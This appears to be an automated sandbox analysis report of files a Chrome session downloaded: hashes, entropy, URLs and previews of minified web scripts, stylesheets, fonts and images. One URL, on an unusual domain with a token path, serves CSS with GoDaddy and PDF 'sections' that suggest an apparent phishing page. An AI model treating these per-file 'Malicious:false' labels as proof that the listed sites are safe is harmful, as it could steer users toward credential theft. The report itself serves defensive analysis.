                                                      Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7492), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):7492
                                                      Entropy (8bit):5.255231476933187
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D4CEA0CCAD06923B3A8DCC169E04DACC
                                                      SHA1:63061098EC9011685E6C75EE37BBCF37B06B1195
                                                      SHA-256:2E763FFE70DD64D17D16EB8130599DCFAA83D5387D6177B18AA439741FB0C9BC
                                                      SHA-512:CD52C5A8E9D91C478EDB1C1F37BD7C8AF7D58991977061D0CBD0B0CFA90D5AA597D258987BFD2F9F52FBA6436EEE160A7DDA69B313592C8618A3A0655238ED90
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/global-error-9c1d146d534ce3a1.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6470],{13902:function(e,t,n){Promise.resolve().then(n.bind(n,94251))},94251:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return s}});var r=n(57437),i=n(575),l=n(27367),o=n(53334),u=n(2265);function s(e){let{error:t,reset:n}=e;return(0,u.useEffect)(()=>{o.Tb(t)},[t]),(0,r.jsx)("html",{children:(0,r.jsxs)("body",{className:"flex w-screen flex-col items-center justify-center space-y-4",children:[(0,r.jsxs)("p",{children:["[Client Error]\xa0",t.message]}),t.digest&&(0,r.jsxs)("p",{children:["Digest: ",t.digest]}),(0,r.jsxs)("p",{children:["If the error persists, please"," ",(0,r.jsx)("a",{href:"mailto:".concat(l.O.NEXT_PUBLIC_SUPPORT_EMAIL),children:"contact us"}),"."]}),(0,r.jsx)(i.z,{onClick:()=>{n()},children:"Try again"})]})})}},27888:function(e,t,n){"use strict";var r=n(40287);class i{static traverseDfs(e,t){let n=[e];for(;n.length;){let e=n.pop();if(!e||t(e))break;r.List.isList(e.children)?(e.children||[]).forE
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (51734)
                                                      Category:downloaded
                                                      Size (bytes):222931
                                                      Entropy (8bit):5.0213311632628725
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0329C939FCA7C78756B94FBCD95E322B
                                                      SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                      SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                      SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                      Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10450)
                                                      Category:downloaded
                                                      Size (bytes):10498
                                                      Entropy (8bit):5.327380141461276
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E0D37A504604EF874BAD26435D62011F
                                                      SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                      SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                      SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                      Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4593), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):4593
                                                      Entropy (8bit):5.713076893074094
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6E6984CCE1268323F3E9AEA1BBAC530E
                                                      SHA1:E6CB858792F7E78D5248BB087E29078B9C18BD6A
                                                      SHA-256:568C2CD7FA19BA47719DFB9C8F91B7681253196FAD647FB1F5900A9045E080FE
                                                      SHA-512:95CFF2D2483363AEBF39BDDB57625C507A0E1D5CCFD4ECC2095DF234B11EE299F02CA0AD76FFEA52368147B855DE9E288C423303D396AD42910A3F5EFDCAFEB1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/main-app-26bd94ad5353fa5f.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1744],{72431:function(){},19089:function(_,n,t){Promise.resolve().then(t.t.bind(t,47690,23)),Promise.resolve().then(t.t.bind(t,48955,23)),Promise.resolve().then(t.t.bind(t,5613,23)),Promise.resolve().then(t.t.bind(t,11902,23)),Promise.resolve().then(t.t.bind(t,31778,23)),Promise.resolve().then(t.t.bind(t,77831,23))},93571:function(_,n,t){"use strict";var e=t(27367),E=t(80985),i=t(8973),o=t(1333),r=window;r.__sentryRewritesTunnelPath__=void 0,r.SENTRY_RELEASE={id:"0ddb97ff08e23729c2f83b9fcf2266105d4a1051"},r.__sentryBasePath=void 0,r.__rewriteFramesAssetPrefixPath__="",i.S1({dsn:e.O.NEXT_PUBLIC_SENTRY_PUBLIC_DSN,enabled:E.JS,environment:e.O.NEXT_PUBLIC_APP_ENV,release:e.O.NEXT_PUBLIC_APP_RELEASE_ID,tracesSampleRate:.25,debug:!1,replaysOnErrorSampleRate:1,replaysSessionSampleRate:.1,integrations:[o.Gs({maskAllText:!0,blockAllMedia:!0})],ignoreErrors:["Suspense Exception: This is not a real error"]})},27367:function(_,n,t){"use stri
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (62537)
                                                      Category:downloaded
                                                      Size (bytes):163889
                                                      Entropy (8bit):5.194217726290058
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:626FC9221E1E0B66F5BCA114EA3AE2C6
                                                      SHA1:72675D678874EFE5F636B107D65A1C13902ABC83
                                                      SHA-256:2DD877D4A117FCD51B7486953F2148084EFDD61F9C09817B9A093E69E6E3566F
                                                      SHA-512:8BEE4E1BD7E32DD8E4183BEC0CD71423BAE435026A0C3308EE66E775287A8C39FF8F5E4F8640DE4FCD6A4A43E7701B42E67CEB70E7517BF2338421F02E4C5CB1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/9977-2c9c97666ad304da.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9977],{2664:function(t,e,n){var r=n(77095);t.exports=function(t,e){return!!(null==t?0:t.length)&&r(t,e,0)>-1}},64797:function(t){t.exports=function(t,e,n){for(var r=-1,i=null==t?0:t.length;++r<i;)if(n(e,t[r]))return!0;return!1}},75422:function(t,e,n){var r=n(22440),i=n(2664),s=n(64797),o=n(83690),a=n(43863),l=n(97399);t.exports=function(t,e,n,c){var h=-1,u=i,d=!0,f=t.length,p=[],m=e.length;if(!f)return p;n&&(e=o(e,a(n))),c?(u=s,d=!1):e.length>=200&&(u=l,d=!1,e=new r(e));t:for(;++h<f;){var g=t[h],y=null==n?g:n(g);if(g=c||0!==g?g:0,d&&y==y){for(var w=m;w--;)if(e[w]===y)continue t;p.push(g)}else u(e,y,c)||p.push(g)}return p}},47495:function(t){t.exports=function(t,e,n,r){for(var i=t.length,s=n+(r?1:-1);r?s--:++s<i;)if(e(t[s],s,t))return s;return -1}},77095:function(t,e,n){var r=n(47495),i=n(77562),s=n(48150);t.exports=function(t,e,n){return e==e?s(t,e,n):r(t,i,n)}},77562:function(t){t.exports=function(t){return t!=t}},17466:function
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12929), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):12929
                                                      Entropy (8bit):5.457645044103907
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:02319C2ED4BB51016EEC5778566692A1
                                                      SHA1:A1E01E36EC4141D1C9AE701B486CA832D09E06A1
                                                      SHA-256:7BC167DEC07558AA123D5F3527A8D97B5139E237078A147F904E20C289DEFDA5
                                                      SHA-512:6E43FCEF48B7781E4B4E519D709FE6AA3C21F0B395EA5E953B4BDFC02BE33BCF0332EA11A8E208B1EECFC3004BC4DAC7435EE36D50905645B237264CA9759391
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/1749-e1429e6ae240e765.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1749],{81749:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return v}});let r=n(86921),i=n(91884),o=n(57437),l=i._(n(2265)),a=r._(n(54887)),s=r._(n(42251)),u=n(38630),d=n(76906),f=n(60337);n(76184);let c=n(46993),p=r._(n(10536)),g={deviceSizes:[640,750,828,1080,1200,1920,2048,3840],imageSizes:[16,32,48,64,96,128,256,384],path:"/_next/image",loader:"default",dangerouslyAllowSVG:!1,unoptimized:!1};function m(e,t,n,r,i,o){let l=null==e?void 0:e.src;e&&e["data-loaded-src"]!==l&&(e["data-loaded-src"]=l,("decode"in e?e.decode():Promise.resolve()).catch(()=>{}).then(()=>{if(e.parentElement&&e.isConnected){if("empty"!==t&&i(!0),null==n?void 0:n.current){let t=new Event("load");Object.defineProperty(t,"target",{writable:!1,value:e});let r=!1,i=!1;n.current({...t,nativeEvent:t,currentTarget:e,target:e,isDefaultPrevented:()=>r,isPropagationStopped:(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (23398), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):23398
                                                      Entropy (8bit):5.104409455331282
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C1C51D30D5E7094136F2D828349E520F
                                                      SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                      SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                      SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/56mWLL7gPT1s05QabyGI8920
                                                      Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (8498)
                                                      Category:downloaded
                                                      Size (bytes):11291
                                                      Entropy (8bit):5.361360115419684
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:659517877AAC6442948B5D0D6660F697
                                                      SHA1:B37EFC293E8AEEB68F308A9E99FD11E4BB9815DC
                                                      SHA-256:E3FC7F4031D1D9DE0B55BB358626067E92E33BC837603116D08033C42D852787
                                                      SHA-512:93E740EC19F1CADB1A0FE94CD5C8D9EA1BB1AA453A3144CDE00FC014939FD5E76140D3642FAABCF1CADE48CFF1F0B645B0706F41DFC24436894A607F9B555F40
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/%5Blocale%5D/share/layout-4a501c87898cd322.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[292],{36376:function(e,t,r){Promise.resolve().then(r.bind(r,37498)),Promise.resolve().then(r.t.bind(r,38507,23))},47907:function(e,t,r){"use strict";r.r(t);var n=r(15313),a={};for(var s in n)"default"!==s&&(a[s]=(function(e){return n[e]}).bind(0,s));r.d(t,a)},30699:function(e,t,r){"use strict";/**. * @license React. * use-sync-external-store-shim.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var n=r(2265),a="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},s=n.useState,o=n.useEffect,i=n.useLayoutEffect,u=n.useDebugValue;function c(e){var t=e.getSnapshot;e=e.value;try{var r=t();return!a(e,r)}catch(e){return!0}}var l="undefined"==typeof window||void 0===window.document||void 0===window.document.createElement?function(e,t){return
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), CFF, length 94068, version 1.196
                                                      Category:downloaded
                                                      Size (bytes):94068
                                                      Entropy (8bit):7.997692317465927
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:A7EAE7F343B8A1AD68F823C878CA152D
                                                      SHA1:F8A2066EF16C6F6D51A92285804AA80E5BCE4D29
                                                      SHA-256:83628233E2C99AE83307266BA1E3F3055124D7BD0E9D7157CD95C9CF3AADD31A
                                                      SHA-512:242629F433DFF2FF86B8D2329D5F0E56A3640F27F090EC13CD60CB0886905CEFA1883C1B06F75AEDFEDBEA2E59FC0C270768D75945AEF48C94DFED587E49678F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/media/8cf3078e5df53bb7-s.p.woff2
                                                      Preview:wOF2OTTO..ot..........o!...........................b..:........`....6.$..&...... [...QE..w....EwL..t.%.....@..]b.WM..h.......\A..mLE.6`*k~..f.............N2...L!Yi.....w...2.4..QV...MK:..wxO.X.t:.g..z`...;p. ..QN...|.P8W...X..li..f.&fLw....STL..kW..f+.v....=']...b.....dQx....8....Q..!..p..B.x.'"..S.\..f%...&.j0..c.S........).o....WT..R..]#....e(E.#E<u.BF8.P..w4./|.....,..4E.,.Io*.OU.*U..4k.PU$..#....i..x.+W.m..2.39.w..........oVk....U.s..o.<.....01bx......;.I....M...&.6f.a8.N.L.z.X..\....x<....P.s..[.x..........;z.+..b......W..Y./..E.....y.es..Gd.,....B>......m<........_.....H...).......s.....(b..~.{.}..#.B...D............m....HY.e.M...i.........D..[<0E4b.k.H.{0.!.S.._.+...2..E....08.&...=9.+.X....&N..w..y.].Z.s....I.s...5|h.>....,\.'...Q..Z#n...Q..[.[1...`.j....y....U.C..p<.........C.............2yMU..L..R.y.J.Ndvu.R.r..9.G.X...jA...t.w!W..K.S..>..l..s.O...S....UI.Y.._...?/..`..}MZ7T.f.34"......K>t...#|.%.y.fL5....3.A........._.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1885), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1885
                                                      Entropy (8bit):5.281546651678301
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BF6B3D050271E71BAC0595A48977AEBE
                                                      SHA1:63386C01B799F2F5D91F37901D83CB1D95EA198D
                                                      SHA-256:2A62CB1F3AA739ACAADC80E2F417B750F019514CC2A295EDB0188C25D7C205BB
                                                      SHA-512:DA994C9E794BA5D7E82BBE0E6AB3E5E28A80C714884180F484F5E9E171A8C1F11F81DFF111BC0D065E449E66A74AB8D281F6D35732834D3E9E2913F7B3B98A56
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/css/99de2d0ba9d76213.css
                                                      Preview:.AccountAvatar_avatar__PrG5y{display:inline-block;height:100%;width:100%;-o-object-fit:contain;object-fit:contain}.AccountAvatar_avatarWrapper__3LY45{height:54px;width:54px;overflow:hidden}.AccountAvatar_avatarWrapper__3LY45,.AccountAvatar_icon__mTpJW{display:flex;align-items:center;justify-content:center;border-radius:50%;transition:border .5s}.AccountAvatar_icon__mTpJW{width:100%;height:100%;background-color:#eaebee;border:#fff}@media (width <= 770px){.AccountAvatar_iconSettings__Ym_WD{background-color:transparent;border:none}}.AccountAvatar_activeMenu__2N3kU,.AccountAvatar_avatarWrapper__3LY45:hover,.AccountAvatar_icon__mTpJW:hover{border:6px solid #c0e6ff}.AccountAvatar_disabled__Ns5xR{border:none!important}.layout_container__Np1Y5{display:flex;height:100%;width:100%;flex-direction:column;overflow-x:hidden}.layout_header__dgDVN{margin-left:auto;margin-right:auto;margin-top:2rem;display:flex;width:100%;max-width:1280px;align-items:center;justify-content:space-between;padding-left:1r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10017)
                                                      Category:downloaded
                                                      Size (bytes):10245
                                                      Entropy (8bit):5.437589264532084
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                      SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                      SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                      SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240702%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240702T143546Z&X-Amz-Expires=300&X-Amz-Signature=a85a527c0ff60ff205ae6fedcf9225dcabc184327281209d90efdca1b586112b&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                      Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):727
                                                      Entropy (8bit):7.573165690842521
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                      SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                      SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                      SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32591), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):32591
                                                      Entropy (8bit):5.580496335710468
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:34EB2BA1FCD0A7E84677F34763DE999C
                                                      SHA1:86FF24529E924D1B03A02BE8816EB99C05DD81DB
                                                      SHA-256:8097CDF66F5DC9053E2979B8DC0FB23CEE6EA0919325544093B3F2A53244C14E
                                                      SHA-512:3F75FA822B5B1D9D595E60F32A40C469C8FAF968B7EA762E09A11125E6AA7A52D91122A26C0C49424B6DD3B36CC9DEEBA1AC776EEC19FCF0007713F6A8B3E2BC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/7158-f62cdbfc6af7f59e.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7158],{58728:function(e,t,n){"use strict";n.d(t,{S:function(){return a}});var r=n(11176);class i{async fetchShareable(e){return(0,r.fk)().get("".concat(this.basePath),{params:{token:e}})}async generateLink(e){return(0,r.fk)().post(this.basePath,e)}async revokeLink(e){let{pageId:t,accountId:n,token:i}=e;await (0,r.fk)().delete("".concat(this.basePath,"?token=").concat(i),void 0,{pageId:t,accountId:n})}constructor(){this.basePath="/api/v1/shareables"}}let a=new i},48325:function(e,t,n){"use strict";n.d(t,{H:function(){return s},p:function(){return o}});var r=n(70156),i=n.n(r);let a={imageUrl:"https://via.placeholder.com/800X500/f4faff/0088e8.JPEG?text=Image",videoSrc:"https://via.placeholder.com/800X400/f4faff/0088e8.JPEG?text=Video"},o=(e,t)=>{let n=[" ","~","`","!","@","#","$","%","^","&","*","(",")","-","_","+","=","{","}","[","]","|","\\","/",":",";","'",'"',"<",">",",",".","?"],r=["a","b","c","d","e","f","g","h","i","j","k","l
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (19051), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):19051
                                                      Entropy (8bit):5.264509906552608
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D1C9BAE180A845EBB7C06EE7A4AAF7B4
                                                      SHA1:F828C8B0B68C9CCA7354BBCEEE08C03BC3476429
                                                      SHA-256:AB6174D82F0DCCDA6A67092CE52318862C74B47D10AAD78D339709C4260ED7A7
                                                      SHA-512:C1F31622BB62E0AB6C0CE8E0D69645CD307EC4CB3EEF392BB5D9F52A7363EFCE417ADB519F3A4972A24F523D85403125C27EAFA6196648BA241C11333B15FDA2
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/7166-2d95c6ac7778916d.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7166],{54493:function(t,e,n){n.d(e,{Cp:function(){return s},RR:function(){return u},cv:function(){return p},dp:function(){return g},dr:function(){return m},oo:function(){return o},uY:function(){return h},x7:function(){return f}});var i=n(20842);function r(t,e,n){let r,{reference:o,floating:l}=t,f=(0,i.Qq)(e),u=(0,i.Wh)(e),c=(0,i.I4)(u),a=(0,i.k3)(e),s="y"===f,d=o.x+o.width/2-l.width/2,p=o.y+o.height/2-l.height/2,h=o[c]/2-l[c]/2;switch(a){case"top":r={x:d,y:o.y-l.height};break;case"bottom":r={x:d,y:o.y+o.height};break;case"right":r={x:o.x+o.width,y:p};break;case"left":r={x:o.x-l.width,y:p};break;default:r={x:o.x,y:o.y}}switch((0,i.hp)(e)){case"start":r[u]-=h*(n&&s?-1:1);break;case"end":r[u]+=h*(n&&s?-1:1)}return r}let o=async(t,e,n)=>{let{placement:i="bottom",strategy:o="absolute",middleware:l=[],platform:f}=n,u=l.filter(Boolean),c=await (null==f.isRTL?void 0:f.isRTL(e)),a=await f.getElementRects({reference:t,floating
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):7390
                                                      Entropy (8bit):4.02755241095864
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                      SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                      SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                      SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                      Malicious:false
                                                      Reputation:unknown
